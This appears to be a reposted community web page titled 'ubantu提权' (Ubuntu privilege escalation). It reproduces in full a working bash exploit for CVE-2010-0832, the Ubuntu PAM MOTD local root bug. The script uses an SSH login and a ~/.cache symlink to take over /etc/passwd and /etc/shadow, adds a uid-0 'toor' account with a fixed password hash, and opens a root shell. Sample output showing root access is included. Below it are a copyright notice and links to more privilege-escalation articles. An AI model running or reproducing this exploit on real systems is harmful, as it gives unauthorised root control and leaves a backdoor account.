#!/bin/bash # # Exploit Title: Ubuntu PAM MOTD local root # Date: July 9, 2010 # Author: Anonymous # Software Link: http://packages.ubuntu.com/ # Version: pam-1.1.0 # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) # CVE: CVE-2010-0832 # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i # # # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. # Does not prompt for login by creating temporary SSH key and authorized_keys entry. # # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh # [*] Ubuntu PAM MOTD local root # [*] Backuped /home/user/.ssh/authorized_keys # [*] SSH key set up # [*] Backuped /home/user/.cache # [*] spawn ssh # [+] owned: /etc/passwd # [*] spawn ssh # [+] owned: /etc/shadow # [*] Restored /home/user/.cache # [*] Restored /home/user/.ssh/authorized_keys # [*] SSH key removed # [+] Success! Use password toor to get root # Password: # root@ubuntu:/home/user# id # uid=0(root) gid=0(root) groupes=0(root) # P='toor:x:0:0:root:/root:/bin/bash' S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' echo "[*] Ubuntu PAM MOTD local root" [ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 backup() { [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak [ -e "$1" ] || return 0 mv "$1"{,.bak} || return 1 echo "[*] Backuped $1" } restore() { [ -e "$1" ] && rm -rf "$1" [ -e "$1".bak ] || return 0 mv "$1"{.bak,} || return 1 echo "[*] Restored $1" } key_create() { backup ~/.ssh/authorized_keys ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 echo "[*] SSH key set up" } key_remove() { rm -f "$KEY" restore ~/.ssh/authorized_keys echo "[*] SSH key removed" } own() { [ -e ~/.cache ] && rm -rf ~/.cache ln -s "$1" ~/.cache || return 1 echo "[*] spawn ssh" ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } echo "[+] owned: $1" } bye() { key_remove exit 1 } KEY="$(mktemp -u)" key_create || { echo "[-] Failed to setup SSH key"; exit 1; } backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } own /etc/passwd && echo "$P" >> /etc/passwd own /etc/shadow && echo "$S" >> /etc/shadow restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } key_remove echo "[+] Success! Use password toor to get root" su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; / chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
ubantu提权
2010-07-16
957
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
#!/bin/bash## Exploit Title: Ubuntu PAM MOTD local root# Date: July 9, 2010# Author: Anonymous# Software Link: http://packages.
目录
相关文章
|
9月前
|
安全
Shell
Linux
|
12月前
|
Linux
开发工具
C语言
|
12月前
|
存储
安全
Unix
|
存储
安全
网络协议
|
安全
Oracle
网络协议
17 linux 提权
linux-全称GNU/Linux,是一种免费使用和自由传播的类UNIX操作系统,是一个基于POSIX的多用户、多任务、友持多线程和多CPU的操作系统。能运行主要的Unix工具软件、应用程序和网络协议。支持32位和64位硬件。Linux继承了Unix认闷经为核心的设计思想,是一个性能稳定的多用户网络操作系统。Linux有上百种不同的发行版,如基于社区开发的debian.archlinux,和基于商业开发的RedHat Enterprise Linux,SUSE,Oracle Linux等。
134
0
0
|
安全
网络安全
数据安全/隐私保护
|
缓存
安全
Ubuntu
|
Linux
数据安全/隐私保护
|
Shell
开发工具
git
sudo提权
参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511
sudo概念:
sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。
2971
0
0
|
Ubuntu
安全
Linux
2018年3月最新的Ubuntu 16.04.4漏洞提权代码
版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/79607202
2018年3月最新的Ubuntu 16.04.4漏洞提权代码,本代码取自Vitaly Nikolenko的推子
亲测阿里云提权可用。
1284
0
0